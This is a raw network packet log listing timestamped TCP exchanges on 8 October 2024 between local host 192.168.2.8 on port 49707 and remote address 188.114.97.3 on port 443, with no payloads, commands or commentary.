Oct 8, 2024 20:52:14.960345984 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.960405111 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.960412025 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.960445881 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.960460901 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.960467100 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.960494995 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.960516930 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.960552931 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.960558891 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.960566044 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.960602999 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.961277962 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.961333036 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.961416006 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.961477995 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.961513042 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.961544991 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.961564064 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.961570024 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.961580038 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.961592913 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.961635113 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.961638927 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.961682081 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.062036037 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.062074900 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.062123060 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.062165976 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.062184095 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.062211990 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.063136101 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.063199997 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.063359976 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.063405037 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.063407898 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.063420057 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.063445091 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.063447952 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.063491106 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.063502073 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.063539028 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.063666105 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.063707113 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.063720942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.063761950 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.064160109 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.064203978 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.064213991 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.064224005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.064238071 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.064248085 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.064268112 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.064269066 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.064280987 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.064292908 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.064312935 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.064327002 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.064970970 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.065004110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.065026999 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.065036058 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.065048933 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.065069914 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.065073967 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.065083027 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.065109968 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.065112114 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.065148115 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.065155029 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.065162897 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.065188885 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.066036940 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.066088915 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.066098928 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.066112041 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.066129923 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.066135883 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.066159964 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.066171885 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.066179991 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.066203117 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.091157913 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.091232061 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.091267109 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.091309071 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.148845911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.148884058 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.148945093 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.148989916 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.149005890 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.149007082 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.149055958 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.149065971 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.149919033 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.149966955 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.149986029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.150023937 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.150032043 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.150042057 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.150134087 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.150415897 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.150451899 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.150475025 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.150485992 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.150499105 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.150525093 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.150959015 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.150976896 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.151015997 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.151022911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.151052952 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.151072025 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.151196957 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.151212931 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.151246071 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.151252031 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.151278973 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.151300907 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.153897047 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.153913021 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.153970957 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.153984070 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.154021978 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.154560089 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.154573917 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.154623985 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.154634953 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.154670954 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.235618114 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.235641956 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.235699892 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.235713005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.235740900 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.235760927 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.236759901 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.236776114 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.236844063 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.236850977 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.236882925 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.236973047 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.236988068 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237035990 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.237041950 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237078905 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.237262011 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237284899 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237323999 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.237329960 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237354040 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.237371922 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.237632036 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237648964 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237688065 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.237694025 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237730980 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.237906933 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237941027 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237956047 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.237961054 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.237987995 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.238003016 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.238337040 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.238353968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.238393068 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.238399029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.238434076 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.238514900 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.238531113 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.238569975 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.238574982 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.238609076 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.322504997 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.322525024 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.322652102 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.322679043 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.322730064 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.323687077 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.323708057 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.323759079 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.323782921 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.323805094 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.323898077 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.323920012 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.323949099 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.323956966 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324006081 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.324006081 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.324230909 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324248075 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324312925 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.324322939 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324368954 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.324611902 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324625969 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324681044 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.324687004 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324698925 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.324929953 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324948072 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.324956894 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.324964046 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.325009108 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.325238943 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.325253010 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.325309992 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.325319052 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.325362921 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.325479984 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.325495005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.325577021 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.325583935 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.325742960 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.409266949 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.409287930 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.409342051 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.409351110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.409379959 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.409398079 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.410659075 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.410674095 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.410748005 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.410753965 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.410787106 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.410800934 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.411648035 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.411669970 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.411720991 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.411726952 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.411775112 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.411914110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.411943913 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.411951065 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.411959887 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.411966085 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.412009001 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.438743114 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.438765049 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.438853979 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.438863993 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.438908100 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.438955069 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.438971043 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.439018011 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.439024925 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.439069033 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.439156055 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.439169884 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.439214945 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.439222097 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.439270020 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.439575911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.439593077 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.439640999 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.439649105 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.439688921 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.496300936 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.496320963 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.496372938 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.496381998 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.496412992 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.496428967 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.498481035 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.498497963 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.498562098 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.498569012 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.498613119 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.498764992 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.498780966 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.498830080 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.498837948 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.498877048 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.498964071 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.498980045 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499023914 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.499031067 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499070883 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.499134064 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499149084 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499192953 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.499200106 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499239922 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.499453068 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499468088 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499505043 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.499511957 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499572992 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.499645948 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499663115 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499723911 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.499730110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499771118 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.499965906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.499984980 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.500026941 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.500035048 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.500056982 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.500078917 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.914232016 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.914242029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.914268970 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.914361954 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.914374113 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.914439917 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.914444923 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.914500952 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.914944887 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.914975882 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.915056944 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.915065050 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.915415049 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.915435076 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.915487051 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.915493011 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.915553093 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.915566921 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.915625095 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.915635109 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.915647984 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.916666031 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.916683912 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.916732073 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.916738033 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.916763067 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.916774988 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.916790962 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.916806936 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.916815996 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.916856050 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.916861057 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917432070 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917448997 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917516947 CEST	49707	443	192.168.2.8	188.114.97.3
